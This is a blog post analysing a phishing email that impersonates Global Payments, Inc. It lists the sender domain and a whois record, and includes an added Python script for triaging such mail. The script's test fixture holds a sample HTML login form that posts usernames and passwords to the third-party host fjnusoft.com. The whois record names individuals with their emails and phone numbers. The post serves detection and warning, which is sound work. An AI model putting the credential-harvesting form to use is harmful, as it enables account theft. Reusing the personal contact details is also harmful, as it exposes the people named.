Analysis of a Chinese Phishing Scam – Global Payments, Inc.

This post will be of particular interest to customers of Global Payments, Inc. I received an email which seemingly came from them, asking for account login details. Since I don’t have an account with them (and before this morning didn’t know who they were), I did some detective work. It turns out to be a phishing scam.

phish·ing/ˈfiSHiNG/
Noun:
The fraudulent practice of sending e-mails purporting to be from legitimate companies in order to induce individuals to reveal personal or confidential information, such as credit card numbers or passwords, by directing a user to a fake email message or website.

Do not trust any emails coming from the domain “global-paymts.com”, e.g. “virtualT@global-paymts.com”. This is not the company “Global Payments, Inc.” (which itself is a legitimate company) but a phishing scam intended to get you to enter your real payment processor login details, which the scammers will then use to access your real account and take all your real monies.

A Google search did not turn anything up, so I did a little investigating myself. The HTML form in the email accepts your login info and sends it to a script at the fjnusoft.com domain. A “whois” search reveals that this is a Chinese domain:

Domain Name.......... fjnusoft.com
Creation Date........ 2007-04-08 11:12:47
Registration Date.... 2007-04-08 11:12:47
Expiry Date.......... 2016-04-08 11:12:47
Organisation Name.... fu jianshida ruanjian
Organisation Address. fujianshifandaxue ruanjianrencaipeiyangjidi
Organisation Address.
Organisation Address. fuzhou
Organisation Address. 350000
Organisation Address. FJ
Organisation Address. CN

Admin Name........... lu qixue
Admin Address........ fujianshifandaxue ruanjianrencaipeiyangjidi
Admin Address........
Admin Address........ fuzhou
Admin Address........ 350000
Admin Address........ FJ
Admin Address........ CN
Admin Email.......... lqx@fjnusoft.com
Admin Phone.......... +86.59187248372
Admin Fax............ +86.59183560708

Tech Name............ jinfeng wang
Tech Address......... BeiGuo East Residential District 26-102
Tech Address.........
Tech Address......... Nantong
Tech Address......... 226001
Tech Address......... JS
Tech Address......... CN
Tech Email........... sales@dns99.net
Tech Phone........... +86.51385292710
Tech Fax............. +86.51385292710

Bill Name............ jinfeng wang
Bill Address......... BeiGuo East Residential District 26-102
Bill Address.........
Bill Address......... Nantong
Bill Address......... 226001
Bill Address......... JS
Bill Address......... CN
Bill Email........... lqx@fjnusoft.com
Bill Phone........... +86.51385292710
Bill Fax............. +86.51385292710
Name Server.......... ns1.dns.com.cn
Name Server.......... ns2.dns.com.cn

Below is the email I received. Note that I use mutt, a text-based email reader. If you are reading your email in a web browser and are hit with this scam email, the text of the message will be the same as below, but you will probably see the HTML form and some image(s) rendered in place of the attachment markers.

From: "GlobalPayments, Inc" 
To: contact@ngmarley.com
Subject: Account Update

[-- Attachment #1 --]
[-- Type: text/plain, Encoding: 7bit, Size: 0.2K --]

Dear GlobalPayments Customer,

Because we registrated to many frauds we decided to lock your Virtual Terminal account.
To unlock it please download the file attached to this e-mail and update your login info.

2012 Copyright Global Payments ,Inc.


[-- Attachment #2: Login_myvirtualmerchant.html --]
[-- Type: application/html, Encoding: 7bit, Size: 2.2K --]

[-- application/html is unsupported (use 'v' to view this part) --]

[-- Attachment #3 --]
[-- Type: text/plain, Encoding: 7bit, Size: 0K --]
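The two checks this post performs by hand (where does the HTML attachment's form actually submit to, and does the sender domain belong to the real company?) can be automated for mail triage. The script below is an added example written for this post, not code from the original author; it uses only the Python standard library. The message it parses is a constructed sample modelled on the scam's structure: the sender address, the `application/html` attachment and the `fjnusoft.com` form target come from the post, while the script path in the form action, the `TRUSTED_DOMAINS` allowlist and all function names are assumptions for the example.

```python
"""Triage helper for a suspected phishing e-mail (added example, not part of the post).

Given a raw RFC 822 message it:
  1. extracts the sender's domain from the From: header,
  2. walks every MIME part and collects the action URL of each <form> found in
     an HTML part or attachment,
  3. flags the message when the sender domain or a form target is not on an
     allowlist of domains the legitimate company uses.
"""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the real company is known to use (assumption for this example).
TRUSTED_DOMAINS = {"globalpaymentsinc.com"}


class FormActionExtractor(HTMLParser):
    """Collects the action attribute of every <form> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            for name, value in attrs:
                if name.lower() == "action" and value:
                    self.actions.append(value)


def sender_domain(msg):
    """Return the lower-cased domain of the From: address, or '' if absent."""
    _, addr = parseaddr(str(msg.get("From", "")))
    return addr.rpartition("@")[2].lower()


def form_targets(msg):
    """Return the host names that HTML forms in the message would submit to."""
    targets = []
    for part in msg.walk():
        ctype = part.get_content_type()
        # The scam used the non-standard 'application/html'; accept both spellings.
        if ctype not in ("text/html", "application/html"):
            continue
        payload = part.get_payload(decode=True)
        if not payload:
            continue
        extractor = FormActionExtractor()
        extractor.feed(payload.decode(part.get_content_charset() or "utf-8", "replace"))
        for action in extractor.actions:
            host = urlparse(action).hostname
            if host:
                targets.append(host.lower())
    return targets


def registrable(domain):
    """Reduce 'www.example.com' to 'example.com' (assumes single-label TLDs)."""
    labels = domain.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else domain


def triage(raw):
    """Parse a raw message and return the findings plus an overall verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    sender = sender_domain(msg)
    targets = form_targets(msg)
    reasons = []
    if sender and registrable(sender) not in TRUSTED_DOMAINS:
        reasons.append(f"sender domain {sender!r} is not a trusted domain")
    for host in targets:
        if registrable(host) not in TRUSTED_DOMAINS:
            reasons.append(f"login form posts to {host!r}")
    return {"sender": sender, "form_targets": targets,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample: a short text part plus an HTML attachment whose login form
# posts to a third-party host. The script path in the action is a placeholder.
SAMPLE_EML = b"""\
From: "GlobalPayments, Inc" <virtualT@global-paymts.com>
To: victim@example.com
Subject: Account Update
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Dear Customer, please open the attached file and update your login info.
--XYZ
Content-Type: application/html; name="Login.html"
Content-Disposition: attachment; filename="Login.html"

<html><body>
<form method="post" action="http://www.fjnusoft.com/EXAMPLE-PATH.php">
User: <input name="user"> Pass: <input name="pass" type="password">
<input type="submit" value="Login">
</form></body></html>
--XYZ--
"""

if __name__ == "__main__":
    result = triage(SAMPLE_EML)
    for line in result["reasons"]:
        print("!", line)
    print("verdict:", "PHISHING" if result["suspicious"] else "no findings")
```

Running it on the sample reports both findings: the sender domain `global-paymts.com` is not on the allowlist, and the form posts to `www.fjnusoft.com`. Either finding alone is enough to quarantine the message; the form target is the stronger signal because a legitimate payment processor never collects credentials through a form that submits to an unrelated domain.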

update: Apparently the company Global Payments, Inc. is aware of this scam, as they have an alert on their homepage and a link to a more detailed alert/disclaimer here: http://www.globalpaymentsinc.com/Alert.html